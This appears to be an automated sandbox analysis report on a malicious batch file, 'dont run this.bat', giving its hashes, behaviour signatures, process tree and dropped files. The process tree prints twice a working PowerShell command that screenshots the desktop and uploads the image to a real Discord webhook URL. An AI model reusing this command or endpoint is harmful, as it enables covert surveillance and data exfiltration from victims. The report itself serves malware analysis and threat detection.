Analysis

  • max time kernel
    60s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03/06/2024, 01:48

General

  • Target

    dont run this.bat

  • Size

    1013B

  • MD5

    b4b00681eae6600fb830308d762457fd

  • SHA1

    d2d11d34e7c91bf486833265adade5769f406618

  • SHA256

    01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28

  • SHA512

    d4b4358580da3018436a9a34ec151f9912cc1675edb9474094570ca6aef4e427bf15de28f24f354a9b8cb0554c094f5c941e6461dc350fcad45ac9770b338209

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A

Signatures

  • Drops file in Drivers directory 64 IoCs
  • Manipulates Digital Signatures 1 IoCs

    Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

  • Drops file in System32 directory 64 IoCs
  • Modifies termsrv.dll 1 TTPs 1 IoCs

    Commonly used to allow simultaneous RDP sessions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"
    1⤵
    • Drops file in Drivers directory
    • Manipulates Digital Signatures
    • Drops file in System32 directory
    • Modifies termsrv.dll
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\system32\timeout.exe
      timeout /t 3
      2⤵
      • Delays execution with timeout.exe
      PID:2840
    • C:\Windows\system32\cmd.exe
      cmd /k "call :spam"
      2⤵
        PID:2968
      • C:\Windows\system32\timeout.exe
        timeout /t 1
        2⤵
        • Delays execution with timeout.exe
        PID:1988
      • C:\Windows\system32\cmd.exe
        cmd /k "call :spam"
        2⤵
          PID:2600
        • C:\Windows\system32\timeout.exe
          timeout /t 1
          2⤵
          • Delays execution with timeout.exe
          PID:2316
        • C:\Windows\system32\cmd.exe
          cmd /k "call :spam"
          2⤵
            PID:2520
          • C:\Windows\system32\timeout.exe
            timeout /t 1
            2⤵
            • Delays execution with timeout.exe
            PID:2556
          • C:\Windows\system32\cmd.exe
            cmd /k "call :spam"
            2⤵
              PID:2624
            • C:\Windows\system32\timeout.exe
              timeout /t 1
              2⤵
              • Delays execution with timeout.exe
              PID:2628
            • C:\Windows\system32\cmd.exe
              cmd /k "call :spam"
              2⤵
                PID:2564
              • C:\Windows\system32\timeout.exe
                timeout /t 1
                2⤵
                • Delays execution with timeout.exe
                PID:2536
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3052
              • C:\Windows\system32\timeout.exe
                timeout /t 3
                2⤵
                • Delays execution with timeout.exe
                PID:1188
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2700

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\05PGI397H7NRNXQIRG02.temp

              Filesize

              7KB

              MD5

              d465fd2563ed5b9dfe253513e7b4899a

              SHA1

              ec6170be9189e497870cdffcc2a8e30412b4f396

              SHA256

              348d830681605d3f550b549cf710a5d3450bfc4708dcfd5a950b8b9fba86b328

              SHA512

              6eb733c2ac7a84c1fc01e802f086700f4673ac129821df2894a4eeacb853400aab170983ab3097dae822a1a9bb3cc066af4e07ab14f393d636b431650f5cf437

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

              Filesize

              7KB

              MD5

              6ae567368f5b9f323d5460e85e9e76a5

              SHA1

              b73764d0136c63faa49f2049b368d7d6c76282a6

              SHA256

              2c5a99a85e4870fb867ac27e150a642b6e28f7db35250a9e3c0c55650738a45c

              SHA512

              9ba3f8de6be3ef208b5b3bc1a4b18db2b43c9b32ffedc2849d1cb3a5f8bff98c1a524a060d8883f9c24fdcef060e1aa8950a157a835f45a99fef3a55edc10523

            • memory/2700-13-0x000000001B660000-0x000000001B942000-memory.dmp

              Filesize

              2.9MB

            • memory/2700-14-0x00000000028E0000-0x00000000028E8000-memory.dmp

              Filesize

              32KB

            • memory/3052-4-0x000000001B5A0000-0x000000001B882000-memory.dmp

              Filesize

              2.9MB

            • memory/3052-5-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

              Filesize

              32KB